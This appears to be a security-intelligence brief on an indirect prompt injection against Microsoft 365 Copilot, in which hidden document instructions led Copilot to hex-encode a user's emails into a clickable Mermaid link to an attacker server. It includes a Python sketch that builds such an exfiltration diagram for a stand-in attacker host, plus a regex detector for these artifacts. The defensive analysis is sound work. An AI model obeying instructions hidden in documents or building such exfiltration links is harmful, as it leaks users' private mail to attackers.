Microsoft 365 Copilot Flaw Lets Hackers Steal Sensitive Data via Indirect Prompt Injection
Researchers demonstrated an indirect prompt injection attack against Microsoft 365 Copilot using booby‑trapped documents. Hidden instructions embedded in a document took effect when a user asked Copilot to summarize it: Copilot fetched the user's recent emails, hex‑encoded their contents, and rendered a clickable Mermaid diagram whose hyperlink carried the encoded data to an attacker‑controlled server when clicked. Microsoft has since disabled hyperlinks in Copilot‑rendered Mermaid diagrams to close the vector.
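To make the exfiltration mechanics concrete, the sketch below reconstructs the general shape of such a payload in Python: harvested text is hex‑encoded and appended to a link inside a Mermaid click directive. The attacker URL, node label, and helper name are hypothetical illustrations for defenders studying the artifact, not the researchers' actual payload.

```python
import binascii

def build_exfil_diagram(stolen_text: str, attacker_url: str) -> str:
    """Reconstruct the reported payload shape: stolen text is hex-encoded
    and smuggled out via the URL of a clickable Mermaid node.
    The URL and label here are hypothetical, for illustration only."""
    hex_blob = binascii.hexlify(stolen_text.encode("utf-8")).decode("ascii")
    return (
        "graph TD\n"
        '    A["Login to view document"]\n'          # benign-looking lure node
        f'    click A "{attacker_url}?d={hex_blob}" "Open"\n'  # data rides in the query string
    )

# Example: even a short email fragment becomes a long hex query parameter.
print(build_exfil_diagram("Subject: Q3 numbers", "https://attacker.invalid/c"))
```

Because the stolen data travels only in the hyperlink, nothing is exfiltrated until the victim clicks, which is why Microsoft's mitigation of disabling Mermaid hyperlinks breaks the chain.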
CORTEX Protocol Intelligence Assessment
Business Impact: A poisoned document can turn an AI assistant into a covert exfiltration channel for mail and other tenant data, creating data‑loss and regulatory exposure.
Technical Context: Context poisoning drives unintended tool invocation, chaining privileged data retrieval into attacker‑controlled output such as rendered diagrams.
Strategic Intelligence Guidance
- Restrict AI assistants’ data access scope and enforce tool‑use policies.
- Scan AI outputs for embedded links and interactive artifacts; a detection sketch follows this list.
- Educate users not to ask assistants to summarize untrusted documents.
- Monitor for unusual AI‑initiated data access patterns, such as bulk email retrieval triggered by a document‑summarization request.
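As a starting point for the output‑scanning guidance above, here is a minimal Python sketch that flags the two artifacts reported in this attack: Mermaid click directives and URLs carrying long hex blobs. The regexes and the 64‑character threshold are assumptions to tune for your environment, not vendor‑supplied detections.

```python
import re

# Heuristics for the reported patterns: Mermaid "click" directives and
# URLs whose query strings carry long hex payloads. The threshold below
# is an assumption; tune it to your own traffic.
HEX_BLOB = re.compile(r"[?&#][\w-]*=?([0-9a-fA-F]{64,})")
MERMAID_CLICK = re.compile(r'^\s*click\s+\w+\s+"(https?://[^"]+)"', re.MULTILINE)
ANY_URL = re.compile(r"https?://[^\s\"')>]+")

def flag_ai_output(text: str) -> list[str]:
    """Return human-readable findings for embedded links and
    interactive Mermaid artifacts in assistant output."""
    findings = []
    for m in MERMAID_CLICK.finditer(text):
        findings.append(f"Mermaid click hyperlink -> {m.group(1)}")
    for m in ANY_URL.finditer(text):
        url = m.group(0)
        if HEX_BLOB.search(url):
            findings.append(f"URL carries long hex payload -> {url[:80]}")
    return findings

# Usage: run over assistant responses before they reach the user.
for finding in flag_ai_output('click A "https://attacker.invalid/c?d=' + "41" * 40 + '" "Open"'):
    print(finding)
```

Such a filter belongs at the rendering layer, where it can strip or quarantine interactive artifacts before the user ever sees a clickable lure.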
Intelligence Source: Microsoft 365 Copilot Flaw Lets Hackers Steal Sensitive Data via Indirect Prompt Injection | Oct 22, 2025